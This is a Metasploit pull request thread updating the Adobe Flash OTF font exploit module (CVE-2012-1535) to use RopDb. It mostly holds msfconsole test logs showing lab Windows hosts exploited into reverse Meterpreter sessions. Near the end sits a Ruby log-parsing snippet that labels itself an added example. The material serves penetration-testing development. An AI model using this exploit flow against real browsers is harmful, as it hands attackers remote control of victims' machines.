
Use RopDb in adobe_flash_otf_font, also cleaner code & output #868

Merged: 1 commit (cve_2012_1535_flash_rop_update into rapid7:master) on Oct 7, 2012

Conversation

@wchen-r7 (Contributor) commented Oct 7, 2012

This pull request has the following changes:

  • More target testing
  • Use of RopDb mixin
  • Cleaner code
  • Cleaner output in msfconsole

Test Results:

Test #1:

msf  exploit(adobe_flash_otf_font) >
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /m7
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt
[*] 10.0.1.6         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:2469) at 2012-10-06 20:40:41 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:2469) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 784
[+] Successfully migrated to process

Test #2:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/49
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /49
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1114) at 2012-10-06 20:45:36 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.6:1114) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3104)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3380
[+] Successfully migrated to process

Test #3:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/ev
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ev
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,265
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1077) at 2012-10-06 20:49:56 -0500
[*] Session ID 5 (10.0.1.3:4444 -> 10.0.1.6:1077) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3464)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3824
[+] Successfully migrated to process

Test #4:

msf  exploit(adobe_flash_otf_font) >
[*]  Local IP: http://10.0.1.3:8080/Ew
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /Ew
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,257
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 6 opened (10.0.1.3:4444 -> 10.0.1.6:1260) at 2012-10-06 20:56:03 -0500
[*] Session ID 6 (10.0.1.3:4444 -> 10.0.1.6:1260) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3420
[+] Successfully migrated to process

Test #5:

msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/gp
[*] Server started.
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /gp
[*] 10.0.1.7         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt.swf
[*] 10.0.1.7         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt
[*] 10.0.1.7         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.7         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 7 opened (10.0.1.3:4444 -> 10.0.1.7:49174) at 2012-10-06 21:02:57 -0500
[*] Session ID 7 (10.0.1.3:4444 -> 10.0.1.7:49174) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2752)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3048
[+] Successfully migrated to process

@jvazquez-r7 (Contributor) commented:

Eyeballed and looks good, also retested with Windows XP SP8 (JRE rop and SWF rop):

msf  exploit(adobe_flash_otf_font) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.128:4444
[*] Started reverse handler on 0.0.0.0:4444 
[!] URIPATH set to /Oz
[*] Using URL: http://0.0.0.0:8080/Oz
msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://192.168.1.128:8080/Oz
[*] Server started.
[*] 192.168.1.152 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /Oz
[*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt.swf
[*] 192.168.1.152    adobe_flash_otf_font - Sending SWF
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt
[*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,2,202,233
[*] 192.168.1.152    adobe_flash_otf_font - Default back to JRE ROP
[*] 192.168.1.152    adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.152:2111) at 2012-10-07 17:16:28 +0200
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.152:2111) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2172)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2628
[+] Successfully migrated to process 
[*] 192.168.1.152 - Meterpreter session 2 closed.  Reason: Died
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /Oz
[*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt.swf
[*] 192.168.1.152    adobe_flash_otf_font - Sending SWF
[*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    adobe_flash_otf_font - Client requesting: /xWZpd.txt
[*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,3,300,268
[*] 192.168.1.152    adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
[*] 192.168.1.152    adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.152:1367) at 2012-10-07 17:22:46 +0200
[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.152:1367) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3112
[+] Successfully migrated to process 

merging!
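As an added example that is not code from the PR or from the module itself, the Ruby below walks msfconsole output of the kind posted in the description and in the retest above, rebuilds each exploit attempt, and records the Flash build the client reported and whether the module used a RopDb chain or fell back to the JRE ROP; `SAMPLE_LOG` is constructed from trimmed lines of those runs, and `versions_without_chain` lists the builds that hit the fallback, which is the list a module maintainer would want when deciding which chains RopDb still lacks.

```ruby
# Added example (not PR/module code): rebuild each exploit attempt from msfconsole
# output and record the ROP path taken. SAMPLE_LOG: constructed, trimmed from the PR.
SAMPLE_LOG = <<~LOG
  [*] 192.168.1.152    adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
  [*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
  [*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,2,202,233
  [*] 192.168.1.152    adobe_flash_otf_font - Default back to JRE ROP
  [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.152:2111) at 2012-10-07 17:16:28 +0200
  [*] 192.168.1.152    adobe_flash_otf_font - Sending HTML
  [*] 192.168.1.152    adobe_flash_otf_font - flash_version 11,3,300,268
  [*] 192.168.1.152    adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
  [*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.152:1367) at 2012-10-07 17:22:46 +0200
  [*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
  [*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
  [*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,257
LOG

Attempt = Struct.new(:client, :target, :flash_version, :rop, :session)
MODULE_RE  = /\A\[\*\]\s+(\S+)\s+adobe_flash_otf_font - (.+)\z/
SESSION_RE = /\A\[\*\] Meterpreter session (\d+) opened \(\S+ -> ([\d.]+):\d+\)/

def parse_attempts(log)
  attempts, live, last_target = [], {}, {}
  log.each_line(chomp: true) do |line|
    if (m = MODULE_RE.match(line))
      client, msg = m[1], m[2]
      case msg
      when /\ATarget selected: (.+)\z/
        last_target[client] = $1                  # logged before every request
      when "Sending HTML"                         # landing page: a new attempt
        attempts << (live[client] = Attempt.new(client, last_target[client]))
      when /\Aflash_version (\S+)\z/
        live[client].flash_version = $1 if live[client]
      when "Default back to JRE ROP"              # RopDb has no chain for this build
        live[client].rop = :jre if live[client]
      when /\AUsing Rop Chain For Flash: (\S+)\z/
        live[client]&.rop = :flash
        live[client].flash_version ||= $1 if live[client]  # older output lacks flash_version
      end
    elsif (m = SESSION_RE.match(line))
      live[m[2]].session = m[1].to_i if live[m[2]]
    end
  end
  attempts
end

# Builds that hit the JRE fallback, i.e. versions RopDb holds no Flash chain for.
def versions_without_chain(attempts)
  attempts.select { |a| a.rop == :jre }.map { |a| a.flash_version || "unknown" }.uniq
end
```

Runs that predate the `flash_version` log line (Test #1 and #5 in the description) come out with an unknown build, which is why the fallback list reports "unknown" rather than guessing.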

@jvazquez-r7 jvazquez-r7 merged commit 5b65608 into rapid7:master Oct 7, 2012
@wchen-r7 wchen-r7 deleted the cve_2012_1535_flash_rop_update branch August 22, 2016 16:23